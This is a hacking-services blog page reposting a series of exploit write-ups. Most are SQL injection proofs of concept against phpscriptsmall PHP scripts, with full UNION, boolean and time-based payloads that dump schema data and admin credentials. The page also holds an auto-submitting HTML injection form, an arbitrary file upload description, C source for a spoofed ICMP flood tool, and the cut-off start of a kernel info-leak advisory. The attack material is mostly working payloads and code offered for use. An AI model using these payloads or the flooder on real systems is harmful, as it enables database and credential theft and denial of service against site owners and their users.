Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863552979

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: Readymade Video Sharing Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit=
# 
# http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit=
# 
# Parameter: report_videos[] (GET)
#     Type: boolean-based blind
#     Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
#     Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit=
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=
# 	
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Multireligion Responsive Matrimonial 4.7.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
# Version: 4.7.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
# 
# -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Responsive Realestate Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-realestate-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1=
# 
# 34 columns
# 
# Parameter: tbud (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: tbud=5001-10000 AND 4719=4719&quicksrch1=
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Responsive Events & Movie Ticket Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
# 
# s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+-
# 
# 
# Parameter: q (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: q=s%' AND 6957=6957 AND '%'='
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: q=s%' AND SLEEP(5) AND '%'='
# 	
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
# 
# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Multiplex Movie Theater Booking Script 3.1.5 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multiplex-theater-booking-script/
# Version: 3.1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
# 
# -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+-
# 
# 
# 2)
# http://localhost/[PATH]/show-time.php?moid=[SQL]
# 
# -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+-
# 
# 
# 3)
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
# 
# -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Entrepreneur Bus Booking Script 3.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
# Version: 3.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/booker_details.php?sourcebus=[SQL]
# 
# -1++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
# 
# -1++/*!09999UNION*/+/*!09999SELECT*/+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)/*!50000FROM*/(adminlogin)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,0x3c62723e555345524e414d453a,admin_username,0x3c62723e504153533a,admin_password,0x3c62723e564552204159415249,0x3c62723e))))x)--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Version: 4.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 2)
# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 3)
# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 4)
# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search=
# 
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 5)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# 6)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
# 
# -45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: MLM Forced Matrix 2.0.9 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forced-matrix/
# Version: 2.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/news-detail.php?newid=[SQL]
#  
# -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
#  
# # # # #
HireHackking 
# # # # # 
# Exploit Title: MLM Forex Market Plan Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
#  
# -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
# 
# 
# 2)
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
#  
# -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-
# 
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
# Version: 3.01
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/city_ajax.php?state_id=[SQL]
#  
# -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
# 
#  
# 2)
# http://localhost/[PATH]/category_list.php?search=[SQL]
#    
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Car Rental Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/countrycode1.php?val=[SQL]
#  
# -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
# 
#  
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Muslim Matrimonial Script 3.02 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/matrimonial-script/
# Version: 3.02
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
#  
# -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
# 
#     
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Resume Clone Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/resume-builder-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/preview.php?id=[SQL]
# 
# -2++/*!08888UNION*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x28313129,0x28313229,0x28313329,0x28313429)--+-
# 
# 	
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Advanced World Database 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
# http://localhost/[PATH]/state.php?country=[SQL]
# 
# Parameter: country (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
# 	
# # # # #
HireHackking 
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Demo: http://vanguard-demo.esy.es/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
# .....................
# $row = $row->fetch(PDO::FETCH_ASSOC);
# $folder_name = $row['id'] * 2;
# $folder_name_2 = $folder_name * 5;
# $check_dir1 = 'uploads/'.$folder_name;
# $check_dir2 = $check_dir.'/'.$folder_name_2;
# if (!is_dir($check_dir1)) { mkdir($check_dir1); }
# if (!is_dir($check_dir2)) { mkdir($check_dir2); }
# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
# $error = 0;
# $upload_path = './';
# .....................
# 	
# Proof of Concept:
# 
# Users Add a new product/Add a product preview...
# 
# http://localhost/[PATH]/
# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
# 
# # # # #
HireHackking 
<!--
# # # # # 
# Exploit Title: Basic Job Site Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://www.phpscriptsmall.com/product/ready-made-job-site-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
-->
<html>
<body>
<form id="allJobsearch" action="http://localhost/onlinejobsearch/job" method="post">
<input name="keyword" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="hidden">
<button type="submit">Ver Ayari</button>
</form>
</body>
</html>
HireHackking 
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - SQL Injection
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/p/[SQL]
#  
# '++/*!50000UNION*/+/*!50000SELECT*/+1%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31%2c32%2c33--+-
# 
#  
# # # # #
HireHackking 
#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <string.h>
#include <netinet/ip.h>
#define handle(i) htons(i)
#define cicmp 32
#define aicmp() (a_flags & cicmp)
#define sending_p() if (sendto(rawsock,&packet,(sizeof packet),0,(struct sockaddr *)&victim,sizeof victim) < 0) {\
perror("sendto");\
exit(-1);\
}
struct sockaddr_in victim;
u_long change(const char *host);
static void inject_iphdr(struct ip *ip, u_char p, u_char len);
char *class2ip(const char *class);
static void send_icmp(u_char garbage);
char *get_plain(const char *crypt_file, const char *xor_data_key);
static void usage(const char *argv0);
u_long dstaddr;
u_short dst_sp, dst_ep, src_sp, src_ep;
char *src_class, *dst_class;
int a_flags, rawsock;
struct {
int a;
int b;
void (*f)(u_char);
} a_list[] = {
{ cicmp, ICMP_ECHO, send_icmp },
{ 0, 0, (void *)NULL },
};
int
main(int argc, char *argv[])
{
int n, i, on = 1;
int b_link;
#ifdef F_PASS
struct stat sb;
#endif
unsigned int until;
a_flags = dstaddr = i = 0;
dst_sp = dst_ep = src_sp = src_ep = 0;
until = b_link = -1;
src_class = dst_class = NULL;
while ( (n = getopt(argc, argv, "Is:h:")) != -1) {
char *p;
switch (n) {
case 'I':
a_flags |= cicmp;
break;
case 'h':
dstaddr = change(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ( (!dstaddr && !i) ||
(dstaddr && i) ||
( !aicmp()) ||
(src_sp != 0 && src_sp > src_ep) ||
(dst_sp != 0 && dst_sp > dst_ep))
usage(argv[0]);
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
for (n = 0; ; ) {
if (b_link != -1 && random() % 100 +1 > b_link) {
if (random() % 200 +1 > 199)
usleep(1);
continue;
}
for (i = 0; a_list[i].f != NULL; ++i) {
if (a_list[i].a & a_flags)
a_list[i].f(a_list[i].b);
}
if (n++ == 100) {
n = 0;
}
}
exit(0);
}
u_long change(const char *host)
{
struct hostent *hp;

if ( (hp = gethostbyname(host)) == NULL) {
perror("gethostbyname");
exit(-1);
}
return *(u_long *)hp->h_addr;
}
#define RANDOM() (int) random() % 255 +1
char *
class2ip(const char *class)
{
static char ip[16];
int i, j;

for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
if (class[i] == '.')
++j;
switch (j) {
case 0:
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
break;
case 1:
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
break;
case 2:
sprintf(ip, "%s.%d", class, RANDOM());
break;
default: strncpy(ip, class, 16);
break;
}
return ip;
}
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_p = p;
ip->ip_tos = 0; 
ip->ip_id = random();
ip->ip_len = len;
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_dst.s_addr = dst_class != NULL ?
inet_addr(class2ip(dst_class)) :
dstaddr;
ip->ip_src.s_addr = src_class != NULL ?
inet_addr(class2ip(src_class)) :
random();
victim.sin_addr.s_addr = ip->ip_dst.s_addr;
}

static void
send_icmp(u_char gargabe)
{
struct packet {
struct ip ip;
struct icmp icmp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_ICMP, handle(sizeof packet));
packet.icmp.icmp_type = ICMP_ECHO;
packet.icmp.icmp_code = 0;
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
sending_p();
}
static void
usage(const char *argv0)
{
printf("-I -h IP\n");
exit(-1);
}
HireHackking 
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405

For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:

int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
  struct rusage *rup, rubuf;
  struct user64_rusage rubuf64;
  struct user32_rusage rubuf32;
  size_t retsize = sizeof(rubuf);     // default: 32 bits 
  caddr_t retbuf = (caddr_t)&rubuf;   // default: 32 bits 
  struct timeval utime;
  struct timeval stime;


  switch (uap->who) {
  case RUSAGE_SELF:
    calcru(p, &utime, &stime, NULL);
    proc_lock(p);
